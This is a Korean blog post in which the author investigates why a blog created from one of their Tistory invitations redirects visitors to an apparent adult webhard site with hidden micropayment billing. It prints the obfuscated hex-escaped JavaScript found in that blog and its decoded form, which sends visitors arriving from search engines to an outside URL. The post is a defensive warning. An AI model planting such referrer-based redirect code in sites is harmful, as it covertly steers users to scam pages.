7월달에 티스토리 초대장이 있던 것들을 다 배포하였다.
그 사람들의 블로그가 어떻게 되었는지 확인을 하러 들어갔다.
글을 적는 사람도 있고 일단 계정만 뚫어둔 사람도 있었다.
그런데......
블로그로 접속이 되는 것이 아니라 다른 사이트로 리다이렉팅 되는 것이다.
다음과 같은 사이트로 넘어갔다.
이런 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 같은 것
그래 어디로 가는지 보자는 심정에서 아무거나 클릭했다.
그랬더니 등장하는 화면이...
이런 쓰펄 웹하드사이트로 추정이 된다.
핸드폰 자동결제도 활성화 되어 있고
19금 관련 자료들도 있는 것으로 보이기는 하지만 정확한 것은 모르겠다.
약관도 잘 안보이게 조그만 창으로 되어있는데...
아마도 핸드폰 소액 자동결제가 되는 형태로 추정이 된다.
저 회사 소제지는 서울에 있는데 이런 사이트를
그냥 남겨두다니 방송통신위원회는 뭐하는 기관인가?
블로그 접속을 했는데 왜 저런 곳으로 갔을까?
이상해서 그 블로그의 코드를 살펴보던중 이상한 것이 발견되었다.
자바스크립트 코드로 아래와 같은 것이 들어가 있었다.
다른 사람이 잘 알아볼수 없도록 문자를 변환시켜둔 것이다.
document.write(unescape("\x3C\x73\x63\x72\x69\x70\x74\x20\
x74\x79\x70\x65\x3D\x27\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27\x3E\x20\x0D\x0A\x69\x66\x28\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x72\x65\x66\x65\x72\x72\x65\x72\x2E\x6D\x61\x74\x63\x68\x28\x22\x2F\x63\x6F\x6D\x7C\x6E\x65\x74\x7C\x63\x6F\x2E\x6B\x72\x7C\x62\x6C\x6F\x67\x73\x65\x61\x72\x63\x68\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x2E\x6B\x72\x7C\x73\x65\x61\x72\x63\x68\x2E\x64\x61\x75\x6D\x2E\x6E\x65\x74\x7C\x73\x65\x61\x72\x63\x68\x2E\x6E\x61\x76\x65\x72\x2E\x63\x6F\x6D\x7C\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x2E\x6B\x72\x7C\x74\x61\x62\x2E\x73\x65\x61\x72\x63\x68\x2E\x64\x61\x75\x6D\x2E\x6E\x65\x74\x7C\x73\x61\x2E\x73\x65\x61\x72\x63\x68\x2E\x64\x61\x75\x6D\x2E\x6E\x65\x74\x7C\x6D\x2E\x73\x65\x61\x72\x63\x68\x2E\x64\x61\x75\x6D\x2E\x6E\x65\x74\x2F\x7C\x62\x69\x6E\x67\x2E\x73\x65\x61\x72\x63\x68\x2E\x64\x61\x75\x6D\x2E\x6E\x65\x74\x7C\x77\x65\x62\x2E\x73\x65\x61\x72\x63\x68\x2E\x6E\x61\x76\x65\x72\x2E\x63\x6F\x6D\x7C\x63\x61\x66\x65\x62\x6C\x6F\x67\x2E\x73\x65\x61\x72\x63\x68\x2E\x6E\x61\x76\x65\x72\x2E\x63\x6F\x6D\x7C\x62\x6C\x6F\x67\x73\x65\x61\x72\x63\x68\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D\x7C\x73\x65\x61\x72\x63\x68\x2E\x6E\x61\x74\x65\x2E\x63\x6F\x6D\x7C\x63\x61\x66\x65\x32\x35\x34\x2E\x64\x61\x75\x6D\x2E\x6E\x65\x74\x2F\x22\x29\x29\x20\x7B\x20\x0D\x0A\x77\x69\x6E\x64\x6F\x77\x2E\x74\x6F\x70\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x69\x77\x69\x6E\x67\x2E\x6E\x65\x74\x2F\x70\x64\x73\x2F\x73\x65\x78\x79\x2F\x69\x6E\x74\x72\x6F\x2F\x74\x69\x73\x5F\x61\x64\x5F\x69\x66\x2E\x68\x74\x6D\x6C\x27\x3B\x20\x0D\x0A\x7D\x20\x0D\x0A\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E"));
그래서 변환을 시켜봤다. (프로그래밍에 지식이 있는 분이라면 쉽게 할수 있습니다.)
이런 .... 입에서 육두문자가 마구 나오게 만드는 코드였다.
if(document.referrer.match("/com|net|co.kr|blogsearch.google.co.kr|search.daum.
net|search.naver.com|www.google.co.kr|tab.search.daum.net|sa.search.daum.net|m.search.daum.net/|bing.search.daum.net|web.search.naver.com|cafeblog.search.naver.com|blogsearch.google.com|search.nate.com|cafe254.daum.net/")) { window.top.location.href='http://www.iwing.net/pds/sexy/intro/tis_ad_if.html'; }
웹에서 접속할때 이전에 있던페이지를 확인하는 것이 있다.
그것을 이용하여 직접주소를 입력하고 오는 사람은 블로그로 이동하게 되어 있고
검색 및 나머지는 해당하는 사이트로 이동하도록 되어 있는 것이었다.
해당 블로그는 신고하여 현재는 접근불가로 만들었습니다.
블로그 초대장을 배포한 사람으로 이런 개 쓰레기 싸이트에 누군가 접속하게 되었을 것이라 생각하니......
혹시라도 해당사이트를 방문한 분들에게
죄송한 마음을 금할수 없습니다.
앞으로 또 초대장을 배포하게 된다면 100번 아니 안드로메다로 갈 정도로 생각을 하고 배포를 하겠습니다.
(아마도 배포는 포기할 것 생각이 듭니다.)
초대장을 배포하셨던 분들은 한번씩 초대한 사람들이 잘 운영되고 있는지 확인들을 해보세요.
'IT 이야기' 카테고리의 다른 글
| 파일 공유 서비스(웹하드) 우리나라와 해외의 차이점 (0) | 2013.08.05 |
|---|---|
| 바이러스 및 애드웨어등 피해를 최소화 하기 위한 방법 (0) | 2013.07.29 |
| proxy(프록시) 를 어떻게 이용하는가? (0) | 2013.07.28 |